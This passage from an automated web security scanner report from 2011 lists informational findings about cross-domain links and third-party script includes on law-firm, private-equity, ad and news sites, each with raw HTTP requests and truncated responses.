User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102', 'CKx')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

19.58. http://www.provequity.com/about_us/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.provequity.com
Path:   /about_us/index.asp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /about_us/index.asp?Section=1,0,0 HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16161
Content-Type: text/html
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.59. http://www.provequity.com/portfolio/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.provequity.com
Path:   /portfolio/index.asp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /portfolio/index.asp?Section=0,2,1& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27612
Content-Type: text/html
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.60. http://www.provequity.com/regions/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.provequity.com
Path:   /regions/index.asp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /regions/index.asp?Section=3,0,0& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15644
Content-Type: text/html
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

19.61. http://www.provequity.com/team/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.provequity.com
Path:   /team/index.asp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /team/index.asp?Employee_Type_ID=All&Section=0,1,1& HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 44998
Content-Type: text/html
Cache-control: private


<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<div class="SecondaryNav_linkButton"><a href="https://services.sungarddx.com/default.aspx?FM=Providence+Funds" onMouseover="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_1.gif');" onMouseout="changeImage('LP_Login','http://www.provequity.com/images/lnav_LP_Login_0.gif');");"><img src="http://www.provequity.com/images/lnav_lp_login_0.gif" width="135" height="28" name="LP_Login" alt="LP Login" border="0" />
...[SNIP]...

20. Cross-domain script include
There are 50 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


20.1. http://ads.bloomberg.com/adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bloomberg.com
Path:   /adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adstream_mjx.ads/bloombergopt/news/sports/international/story/1340347661@x24,x70,x60,x62,x80,x81,x82,x83?http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&ALLTOP&SPNATOP&SPWWTOP&GENTOP&USTOP&OLYTOP&TOP&WWTOP&marketstatus1&& HTTP/1.1
Host: ads.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; opt=no-opt

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8755
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e5e45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'x24') {
document.write ('<A HREF="http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/1220895524/x24/default
...[SNIP]...
/ad.amtk-media.com/iframe?spacedesc=2107090_1090554_300x600_1205077_2107090&target=_blank&@CPSC@=" WIDTH=300 HEIGHT=600 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107090_1090554_300x600_1205077_2107090&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/131253292/x60/Bloomberg/3259246/3259246_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
://ad.amtk-media.com/iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@=" WIDTH=728 HEIGHT=90 SCROLLING="No" FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0>\n');
document.write ('<SCRIPT SRC="http://ad.amtk-media.com/jscript?spacedesc=2107089_1090554_728x90_1204852_2107089&ML_NIF=Y&target=_blank&@CPSC@=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/1587021916/x70/Bloomberg/3259241/3259241_.html/72634857383032345a51594144454b2b"></SCRIPT>
...[SNIP]...
</script>\n');
}
if (position == 'x80') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5877.774.5057472001621/B5104260;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/323024100/x80/Bloomberg/3526793/3526793.html/72634857383032345a51594144454b2b?;ord=323024100?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N568.273558.BLOOMBERG1/B3885816.3;abr=!ie;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/600377597/x81/Bloomberg/3848309/DowJones_DART_NewsTradebar_88x31.html/72634857383032345a51594144454b2b?;ord=600377597?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
</IFRAME>\n');
}
if (position == 'x82') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-emea.doubleclick.net/adj/N1379.290479.MEDIABUYER/B5191871;sz=88x31;click0=http://ads.bloomberg.com/RealMedia/ads/click_lx.ads/bloombergopt/news/sports/international/story/L44/2052462841/x82/Bloomberg/3750448/Citifx_Button_88x31_March11th.html/72634857383032345a51594144454b2b?;ord=2052462841?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

20.2. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 331

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/2
...[SNIP]...

20.3. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-1979187633561026&output=html&h=250&slotname=7597199020&w=300&lmt=1305218253&flash=10.2.154&url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&dt=1305200253399&bpp=8&shv=r20110427&jsv=r20110427&correlator=1305200253495&frm=0&adk=1684246542&ga_vid=790518761.1303930135&ga_sid=1305200254&ga_hid=1229711023&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=211&xpc=zWqV5KscOz&p=http%3A//www.bloomberg.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:37:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13474

<!doctype html><html><head><style>a{color:#0033cc}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.4. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:16:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3592

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.5. http://investmentfirmsdirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investmentfirmsdirect.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: investmentfirmsdirect.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 31 Dec 2001 7:32:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19148

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<link rel="stylesheet" href="http://webezines.kwithost.com/lightbox/css/jquery.lightbox-0.5.css" type="text/css" media="screen" />

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
<script src="http://webezines.kwithost.com/lightbox/js/jquery.lightbox-0.5.js" type="text/javascript"></script>
...[SNIP]...

20.6. http://livetechtv.com/survey/c/indexns.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livetechtv.com
Path:   /survey/c/indexns.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /survey/c/indexns.html HTTP/1.1
Host: livetechtv.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:02:06 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "2024-4dc24efd-0"
Last-Modified: Thu, 05 May 2011 07:17:17 GMT
Content-Type: text/html
Content-Length: 8228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</style>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...

20.7. http://pepperhamilton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pepperhamilton.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA HTTP/1.1
Host: pepperhamilton.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayzustqxtwswvrsr; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: pepperhamilton.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: Spusr=3c0015ac4dd84dcbcc2919f5; path=/; expires=Sat, 11-May-2013 12:01:45 GMT
Content-Length: 51485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> pepperhamilton.com </title>
<meta http-equiv="Keywords"
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

20.8. http://privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
